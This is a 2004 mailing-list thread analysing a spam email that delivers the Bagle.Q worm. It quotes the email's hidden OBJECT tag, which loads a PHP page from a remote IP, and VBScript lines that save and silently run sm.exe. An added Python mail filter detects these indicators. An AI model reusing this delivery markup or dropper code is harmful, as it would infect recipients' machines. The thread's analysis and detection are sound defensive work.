Chris Santerre wrote:

I think this is spam :-) I don't allow scripting from my machine. Anyone
get something like this? (I munged the To field.)


Received: from aandrews.org (orf-dsl5010-64-83-56-134-vlan12.dsl.cavtel.net
[64.83.56.134])
by moglobal.com (8.12.5/8.12.5) with SMTP id i2IEZt0t017750
for <[EMAIL PROTECTED]>; Thu, 18 Mar 2004 09:36:05 -0500
Date: Thu, 18 Mar 2004 09:31:55 -0500
To: [EMAIL PROTECTED]
Subject: Encrypted document


<html><body>
<font  face="System">
<OBJECT STYLE="display:none" DATA="http://68.115.29.29:81/679186.php";>
</OBJECT></body></html>

Tried to go to the site without the php file but got nothing. It appears to
point to a home broadband user's machine. Possibly trojaned??? Anyone got
the guts to check out the php script? I don't! :)

Hi,

Bagle.Q, the php executes a vbscript posing as "Windows Update" and gets a file called sm.exe and runs it. The relevant code is below:

TSO.write "BinaryStream.SaveToFile ""sm.exe"", adSaveCreateOverWrite" & vbcrlf
TSO.write "Dim WshShell" & vbcrlf
TSO.write "Set WshShell = CreateObject(""WScript.Shell"")" & vbcrlf
TSO.write "WshShell.Run ""sm.exe"", 0, false" & vbcrlf


The php file generates a 1776 byte html file that contains the above code (as well as additional stuff); it's safe to fetch or wget the url on a U*ix machine.

Regards,

Rick
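An added example (not from either poster) showing how a mail filter could flag the two indicators discussed in this thread: the hidden OBJECT tag loading from a remote host in Chris's sample, and the WScript.Shell / SaveToFile dropper strings Rick quotes. The sample message is constructed to mirror the posted HTML, with placeholder addresses.

```python
import re
from email import message_from_string

# Constructed sample modelled on the message quoted in the thread;
# addresses are placeholders, the OBJECT tag mirrors the one posted.
SAMPLE_MAIL = """From: sender@example.invalid
To: victim@example.invalid
Subject: Encrypted document
Content-Type: text/html

<html><body>
<font  face="System">
<OBJECT STYLE="display:none" DATA="http://68.115.29.29:81/679186.php";>
</OBJECT></body></html>
"""

# <object ...> with its attribute list; attributes may appear in any order
OBJECT_RE = re.compile(r"<object\b([^>]*)>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"', re.IGNORECASE)
# Strings characteristic of the dropper script quoted in the thread
DROPPER_RE = re.compile(r"WScript\.Shell|SaveToFile|WshShell\.Run", re.IGNORECASE)

def html_bodies(raw):
    """Yield the decoded text of every text/html part of a raw RFC 822 message."""
    msg = message_from_string(raw)
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            yield part.get_payload(decode=True).decode("latin-1", "replace")

def hidden_remote_objects(html):
    """Return DATA URLs of OBJECT tags that are hidden and load from a remote host."""
    hits = []
    for m in OBJECT_RE.finditer(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        data = attrs.get("data", "")
        hidden = "display:none" in attrs.get("style", "").replace(" ", "").lower()
        if hidden and re.match(r"https?://", data, re.IGNORECASE):
            hits.append(data)
    return hits

def scan_message(raw):
    """Summarise indicators: hidden remote OBJECT URLs and dropper strings in the body."""
    objects, dropper = [], False
    for html in html_bodies(raw):
        objects.extend(hidden_remote_objects(html))
        dropper = dropper or bool(DROPPER_RE.search(html))
    return {"hidden_objects": objects, "dropper_strings": dropper,
            "suspicious": bool(objects) or dropper}

if __name__ == "__main__":
    print(scan_message(SAMPLE_MAIL))
```

The same `hidden_remote_objects` check also works on the fetched 1776-byte page Rick mentions, since it is plain HTML rather than a mail message.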


